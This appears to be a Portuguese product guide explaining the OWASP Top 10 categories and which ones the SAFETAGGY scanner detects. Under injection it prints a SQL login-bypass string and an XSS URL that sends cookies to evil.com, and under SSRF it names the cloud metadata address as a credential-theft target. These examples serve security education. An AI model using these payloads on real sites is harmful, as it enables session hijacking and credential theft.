OWASP Top 10 (2021) explicado em português
O OWASP Top 10 é a referência mundial das vulnerabilidades mais críticas em aplicações web. Este guia explica cada categoria em português, com exemplos práticos e como o SAFETAGGY ajuda a detectá-las.
A01 — Broken Access Control (Controle de acesso quebrado)
Ocorre quando usuários conseguem acessar recursos ou ações que não deveriam. É a vulnerabilidade mais comum em aplicações web.
Exemplo real: um usuário comum acessa /api/users/123/dados trocando o ID para ver dados de outro usuário (IDOR).
SAFETAGGY detecta: diretórios expostos, páginas de admin acessíveis, endpoints sem autenticação. O Deep Scan testa IDOR e escalonamento de privilégios.
A02 — Cryptographic Failures (Falhas criptográficas)
Dados sensíveis transmitidos ou armazenados sem criptografia adequada. Inclui certificados expirados, TLS desatualizado e hashing fraco.
Exemplo real: site de e-commerce usando HTTP (sem TLS) na página de checkout, expondo dados de cartão em texto plano.
SAFETAGGY detecta: ausência de HTTPS, certificado inválido, TLS 1.0/1.1, HSTS ausente, mixed content (HTTP em página HTTPS).
A03 — Injection (Injeção)
Dados não confiáveis são enviados a um interpretador como parte de um comando ou query. Inclui SQL injection, XSS, command injection e LDAP injection.
Exemplo real:
-- SQL Injection em campo de login
SELECT * FROM users WHERE email = '' OR 1=1 --' AND password = '...'
// XSS refletido em campo de busca
https://site.com/busca?q=<script>document.location='https://evil.com?c='+document.cookie</script>SAFETAGGY detecta: CSP ausente (proteção contra XSS), X-Content-Type-Options ausente. O Deep Scan testa SQL injection (sqlmap), XSS (dalfox) e command injection (commix) ativamente.
A04 — Insecure Design (Design inseguro)
Falhas fundamentais na arquitetura da aplicação que não podem ser corrigidas apenas com código. Envolve falta de modelagem de ameaças e controles de segurança por design.
Exemplo real: sistema de recuperação de senha que pergunta "qual o nome do seu pet?" em vez de enviar um link por e-mail, permitindo engenharia social.
SAFETAGGY detecta: formulários sem CSRF token, ausência de rate limiting em endpoints de autenticação.
A05 — Security Misconfiguration (Configuração incorreta)
Configurações padrão inseguras, headers ausentes, mensagens de erro detalhadas ou serviços desnecessários expostos.
Exemplo real: aplicação em produção com stack traces visíveis no erro 500, revelando caminhos internos e versões de bibliotecas.
SAFETAGGY detecta: headers de segurança ausentes (CSP, HSTS, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy), server version disclosure, diretórios listáveis.
A06 — Vulnerable and Outdated Components (Componentes vulneráveis)
Uso de bibliotecas, frameworks ou dependências com vulnerabilidades conhecidas (CVEs).
Exemplo real: site usando jQuery 2.x com XSS conhecido, ou WordPress com plugin desatualizado permitindo upload de arquivos maliciosos.
SAFETAGGY detecta: tech stack identificado na varredura (frameworks e versões), SRI ausente em scripts de CDN. O Deep Scan usa nuclei para buscar CVEs conhecidos nos componentes detectados.
A07 — Identification and Authentication Failures (Falhas de autenticação)
Falhas no sistema de login e gerenciamento de sessão, como senhas fracas permitidas, brute force sem proteção ou tokens de sessão previsíveis.
Exemplo real: endpoint de login sem rate limiting, permitindo ataques de força bruta automatizados.
SAFETAGGY detecta: cookies sem flags Secure e HttpOnly, formulários de login sem HTTPS, autocomplete habilitado em campos de senha.
A08 — Software and Data Integrity Failures (Falhas de integridade)
Código ou dados de fontes externas são usados sem verificação de integridade. Inclui dependências não verificadas e pipelines de CI/CD inseguros.
Exemplo real: script de analytics carregado de CDN sem atributo integrity (SRI). Se o CDN for comprometido, o script malicioso é executado no seu site.
SAFETAGGY detecta: scripts externos sem SRI, ausência de CSP, recursos carregados via HTTP em páginas HTTPS (mixed content).
A09 — Security Logging and Monitoring Failures (Falhas de monitoramento)
Ausência de logs de segurança adequados, monitoramento e resposta a incidentes. Sem visibilidade, ataques passam despercebidos por semanas ou meses.
Exemplo real: brute force no login acontece por dias sem gerar alertas porque não há monitoramento de tentativas falhas.
SAFETAGGY detecta: use varreduras agendadas com webhooks para monitoramento contínuo de segurança. O relatório de conformidade destaca gaps de monitoramento.
A10 — Server-Side Request Forgery (SSRF)
A aplicação faz requisições HTTP a URLs fornecidas pelo usuário sem validação, permitindo acesso a recursos internos da infraestrutura.
Exemplo real: funcionalidade "importar imagem via URL" que permite acessar http://169.254.169.254/ para roubar credenciais de cloud.
SAFETAGGY detecta: o Deep Scan testa endpoints que aceitam URLs contra SSRF. O SAFETAGGY valida webhooks contra IPs privados como medida de proteção.
Resumo: OWASP Top 10 e SAFETAGGY
| Categoria | Varredura padrão | Deep Scan |
|---|---|---|
| A01 — Broken Access Control | Diretórios expostos, admin aberto | IDOR, escalação de privilégios |
| A02 — Cryptographic Failures | HTTPS, TLS, HSTS, mixed content | testssl.sh (cifras, certificados) |
| A03 — Injection | CSP, X-Content-Type-Options | sqlmap, dalfox, commix |
| A04 — Insecure Design | CSRF token, rate limiting | - |
| A05 — Security Misconfiguration | 6 headers, server disclosure | nuclei, nmap, ffuf |
| A06 — Vulnerable Components | Tech stack, SRI | nuclei (CVE scanning) |
| A07 — Authentication Failures | Cookie flags, autocomplete | - |
| A08 — Integrity Failures | SRI, CSP, mixed content | - |
| A09 — Monitoring Failures | Relatório de conformidade | - |
| A10 — SSRF | - | Testes de SSRF em endpoints |
Descubra quais riscos do OWASP Top 10 afetam seu site
Execute uma varredura gratuita e veja quais categorias do OWASP Top 10 precisam de atenção.
Iniciar varredura